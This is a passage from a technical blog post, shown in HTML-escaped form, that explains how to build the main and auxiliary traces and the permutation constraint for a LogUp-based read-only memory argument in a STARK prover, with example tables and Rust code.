&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;40&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The main trace would become:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$a’$&lt;&#x2F;th&gt;&lt;th&gt;$v’$&lt;&#x2F;th&gt;&lt;th&gt;$m$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;40&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;40&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Notice that although the original table does not represent a valid read-only memory (since address 2 has two different values, 20 and 40), we can still construct the main trace. Later, the &lt;code&gt;SingleValueConstraint&lt;&#x2F;code&gt; transition constraint will ensure that such tables are rejected.&lt;&#x2F;p&gt;
&lt;p&gt;In our implementation, the function &lt;code&gt;read_only_logup_trace()&lt;&#x2F;code&gt; handles the construction of the main trace. It returns a &lt;code&gt;TraceTable&lt;&#x2F;code&gt; containing the five main columns described above and an auxiliary column initially filled with zeros, which will later be replaced with the appropriate values.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Return a trace table with an auxiliary column full of zeros (that will then be replaced with the correct values by the AIR)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; and the following five main columns:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; The original addresses and values, the sorted addresses and values without duplicates, and&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; the multiplicities of each sorted address and value in the original ones (i.e., how many times they appear in the original address and value columns).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn read_only_logup_trace&amp;lt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsPrimeField + IsFFTField + IsSubFieldOf&amp;lt;E&amp;gt; + Send + Sync,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    E: IsField + Send + Sync,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    addresses: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    values: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; TraceTable&amp;lt;F, E&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We order the addresses and values.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut address_value_pairs: Vec&amp;lt;_&amp;gt; = addresses.iter().zip(values.iter()).collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    address_value_pairs.sort_by_key(|(addr, _)| addr.representative());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We define the main columns that will be added to the original ones.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut multiplicities = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut sorted_addresses = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut sorted_values = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (key, group) in &amp;amp;address_value_pairs.into_iter().group_by(|&amp;amp;(a, v)| (a, v)) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let group_vec: Vec&amp;lt;_&amp;gt; = group.collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        multiplicities.push(FieldElement::&amp;lt;F&amp;gt;::from(group_vec.len() as u64));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        sorted_addresses.push(key.0.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        sorted_values.push(key.1.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We resize the sorted addresses and values with the last value of each one so they have the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; same number of rows as the original addresses and values. However, their multiplicity should be zero.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sorted_addresses.resize(addresses.len(), sorted_addresses.last().unwrap().clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    sorted_values.resize(addresses.len(), sorted_values.last().unwrap().clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    multiplicities.resize(addresses.len(), FieldElement::&amp;lt;F&amp;gt;::zero());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let main_columns = vec![&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        addresses.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        values.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        sorted_addresses,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        sorted_values,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        multiplicities,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; We create a vector of the same length as the main columns, filled with zeros from the field extension, and place it as the auxiliary column.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zero_vec = vec![FieldElement::&amp;lt;E&amp;gt;::zero(); main_columns[0].len()];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    TraceTable::from_columns(main_columns, vec![zero_vec], 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;auxiliary-trace&quot;&gt;Auxiliary Trace&lt;&#x2F;h3&gt;
&lt;p&gt;Now, let’s see how to construct the auxiliary column. The auxiliary column, which we’ll call $s$, should accumulate the sums of the fractions corresponding to each row of the main table as follows:&lt;&#x2F;p&gt;
&lt;p&gt;$$ \begin{align} s_0 &amp;amp;= \frac {m_0} {z - (a^\prime_0 + \alpha v^\prime_0)} - \frac {1} {z - (a_0 + \alpha v_0)},&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
s_1 &amp;amp;= s_0 + \frac { m_1 } {z - (a^\prime_1 + \alpha v^\prime_1)} - \frac {1} {z - (a_1 + \alpha v_1)} \end{align}$$&lt;&#x2F;p&gt;
&lt;p&gt;And so on, obtaining:&lt;&#x2F;p&gt;
&lt;p&gt;$$s_{i + 1} = s_i + \frac {m_{i + 1}} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})} - \frac {1} {z - (a_{i + 1} + \alpha v_{i + 1})} \text{ with } i \in \{0, \ldots, n - 2\}.$$&lt;&#x2F;p&gt;
&lt;p&gt;As an example, if our main trace was:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$a’$&lt;&#x2F;th&gt;&lt;th&gt;$v’$&lt;&#x2F;th&gt;&lt;th&gt;$m$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Then, our auxiliary column trace $s$ would look like this:&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$a$&lt;&#x2F;th&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$a’$&lt;&#x2F;th&gt;&lt;th&gt;$v’$&lt;&#x2F;th&gt;&lt;th&gt;$m$&lt;&#x2F;th&gt;&lt;th&gt;$s$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$\frac {1} {z - (1 + \alpha 10)} - \frac {1} {z - (3 + \alpha 30)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;10&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;$s_0 + \frac {2} {z - (2 + \alpha 20)} - \frac {1} {z - (1 + \alpha 10)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$s_1 + \frac {1} {z - (3 + \alpha 30)} - \frac {1} {z - (2 + \alpha 20)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;20&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;30&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;$s_2 + \frac {0} {z - (3 + \alpha 30)} - \frac {1} {z - (2 + \alpha 20)}$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;Observe that if the main trace indeed represents a permutation with multiplicities, then in the last element of $s$ (that is, $s_{n - 1}$) all the fractions cancel each other out, so the accumulated sum is $0$ (i.e. $s_{n - 1} = 0$). This is analogous to the Grand Product, where we verify that all the factors cancel and the final product equals $1$ (i.e. $p_{n - 1} = 1$). Let’s see this in the example from the table above:&lt;&#x2F;p&gt;
&lt;p&gt;$$ \begin{align}&lt;br &#x2F;&gt;
s_{n - 1} &amp;amp;= {\style{color: orange} {\frac {1} {z - (1 + \alpha 10)}}} - \style{color: cyan} {\frac {1} {z - (3 + \alpha 30)}}&lt;br &#x2F;&gt;
\newline&lt;br &#x2F;&gt;
&amp;amp;+ \style{color: magenta} {\frac {2} {z - (2 + \alpha 20)}} - {\style{color: orange} {\frac {1} {z - (1 + \alpha 10)}}}&lt;br &#x2F;&gt;
\newline&lt;br &#x2F;&gt;
&amp;amp;+ \style{color: cyan} {\frac {1} {z - (3 + \alpha 30)}} - \style{color: magenta} {\frac {1} {z - (2 + \alpha 20)}}&lt;br &#x2F;&gt;
\newline&lt;br &#x2F;&gt;
&amp;amp;+ \frac {0} {z - (3 + \alpha 30)} - \style{color: magenta} {\frac {1} {z - (2 + \alpha 20)}}&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;= 0&lt;br &#x2F;&gt;
\end{align}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
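&lt;p&gt;The telescoping argument above can be checked numerically. Below is a minimal, self-contained sketch that does not use the lambdaworks API: arithmetic is done directly modulo the Mersenne prime $2^{31} - 1$, and the challenges &lt;code&gt;z&lt;&#x2F;code&gt; and &lt;code&gt;alpha&lt;&#x2F;code&gt; are arbitrary placeholder values rather than verifier-sampled ones. It builds the running sum $s$ for the example table and checks that the final accumulator is zero.&lt;&#x2F;p&gt;

```rust
// Minimal sketch of the LogUp running sum, independent of lambdaworks.
// All arithmetic is in the prime field F_p with p = 2^31 - 1.

const P: u128 = 2_147_483_647; // Mersenne prime 2^31 - 1

fn add(a: u128, b: u128) -> u128 { (a + b) % P }
fn sub(a: u128, b: u128) -> u128 { (a + P - b % P) % P }
fn mul(a: u128, b: u128) -> u128 { (a * b) % P }

// Modular inverse via Fermat's little theorem: a^(p - 2) mod p.
fn inv(a: u128) -> u128 {
    let (mut base, mut exp, mut acc) = (a % P, P - 2, 1u128);
    while exp > 0 {
        if exp & 1 == 1 { acc = mul(acc, base); }
        base = mul(base, base);
        exp >>= 1;
    }
    acc
}

// Builds the accumulator s over the example table and returns its last value.
fn final_accumulator() -> u128 {
    // Main trace from the worked example: (a, v), sorted (a', v'), multiplicities m.
    let a = [3u128, 1, 2, 2];
    let v = [30u128, 10, 20, 20];
    let a_sorted = [1u128, 2, 3, 3];
    let v_sorted = [10u128, 20, 30, 30];
    let m = [1u128, 2, 1, 0];

    // Placeholder challenges; in the protocol these are sampled by the verifier.
    let (z, alpha) = (987_654_321u128, 123_456_789u128);

    // s_{i+1} = s_i + m_{i+1} / (z - (a'_{i+1} + alpha v'_{i+1}))
    //               - 1 / (z - (a_{i+1} + alpha v_{i+1}))
    let mut s = 0u128;
    for i in 0..a.len() {
        let sorted_term = inv(sub(z, add(a_sorted[i], mul(alpha, v_sorted[i]))));
        let unsorted_term = inv(sub(z, add(a[i], mul(alpha, v[i]))));
        s = sub(add(s, mul(m[i], sorted_term)), unsorted_term);
    }
    s
}

fn main() {
    // Every fraction appears once weighted by its multiplicity and once with
    // a minus sign, so the sum telescopes to zero.
    assert_eq!(final_accumulator(), 0);
}
```

&lt;p&gt;Since the sorted pairs weighted by their multiplicities form the same multiset as the unsorted pairs, the assertion holds for any choice of challenges that keeps the denominators nonzero.&lt;&#x2F;p&gt;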
&lt;p&gt;Now, let’s see how this is implemented in our code. In Lambdaworks, the construction of the auxiliary trace is handled within the AIR implementation. Specifically, in the implementation of &lt;code&gt;LogReadOnlyRAP&lt;&#x2F;code&gt;, you can find the function &lt;code&gt;build_auxiliary_trace()&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn build_auxiliary_trace(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace: &amp;amp;mut TraceTable&amp;lt;Self::Field, Self::FieldExtension&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges: &amp;amp;[FieldElement&amp;lt;E&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Self::FieldExtension: IsFFTField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Main table&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let main_segment_cols = trace.columns_main();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a = &amp;amp;main_segment_cols[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v = &amp;amp;main_segment_cols[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a_sorted = &amp;amp;main_segment_cols[2];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v_sorted = &amp;amp;main_segment_cols[3];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let m = &amp;amp;main_segment_cols[4];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Challenges&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z = &amp;amp;challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let alpha = &amp;amp;challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let trace_len = trace.num_rows();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut aux_col = Vec::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; s_0 = m_0&#x2F;(z - (a&amp;#39;_0 + α * v&amp;#39;_0)) - 1&#x2F;(z - (a_0 + α * v_0))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let unsorted_term = (-(&amp;amp;a[0] + &amp;amp;v[0] * alpha) + z).inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let sorted_term = (-(&amp;amp;a_sorted[0] + &amp;amp;v_sorted[0] * alpha) + z).inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    aux_col.push(&amp;amp;m[0] * sorted_term - unsorted_term);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Apply the same equation given in the permutation transition constraint to the rest of the trace.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; s_{i+1} = s_i + m_{i+1}&#x2F;(z - (a&amp;#39;_{i+1} + α * v&amp;#39;_{i+1})) - 1&#x2F;(z - (a_{i+1} + α * v_{i+1}))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for i in 0..trace_len - 1 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let unsorted_term = (-(&amp;amp;a[i + 1] + &amp;amp;v[i + 1] * alpha) + z).inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let sorted_term = (-(&amp;amp;a_sorted[i + 1] + &amp;amp;v_sorted[i + 1] * alpha) + z)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .inv()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        aux_col.push(&amp;amp;aux_col[i] + &amp;amp;m[i + 1] * sorted_term - unsorted_term);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (i, aux_elem) in aux_col.iter().enumerate().take(trace.num_rows()) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        trace.set_aux(i, 0, aux_elem.clone())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;transition-constraints&quot;&gt;Transition constraints&lt;&#x2F;h3&gt;
&lt;p&gt;Now, let’s look at how we should define the transition constraints for a continuous read-only memory using LogUp. The first two transition constraints explained in the previous post remain unchanged. That is, we don’t need to make any modifications to &lt;code&gt;ContinuityConstraint&lt;&#x2F;code&gt; and &lt;code&gt;SingleValueConstraint&lt;&#x2F;code&gt;, as the method for verifying that the memory is read-only and continuous using the $a’$ and $v’$ columns remains the same.&lt;&#x2F;p&gt;
&lt;p&gt;However, modifying the third constraint, called &lt;code&gt;PermutationConstraint&lt;&#x2F;code&gt;, is essential. This constraint ensures that the auxiliary column $s$ is constructed correctly. It must be checked that $s_i$ satisfies the equation mentioned before:&lt;&#x2F;p&gt;
&lt;p&gt;$$s_{i+1} = s_i + \frac {m_{i+1}} {z - (a^\prime_{i + 1} + \alpha v^\prime_{i + 1})} - \frac {1} {z - (a_{i+1} + \alpha v_{i+1})} \text{ with } i \in \{0, \ldots, n - 2\}.$$&lt;&#x2F;p&gt;
&lt;p&gt;Since constraints must be expressed without division, we will multiply both sides of the equality by the common denominator. This transforms the constraint into the following form:&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{align}s_{i+1} &amp;amp;\cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1})) =&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;=s_i \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))&lt;br &#x2F;&gt;
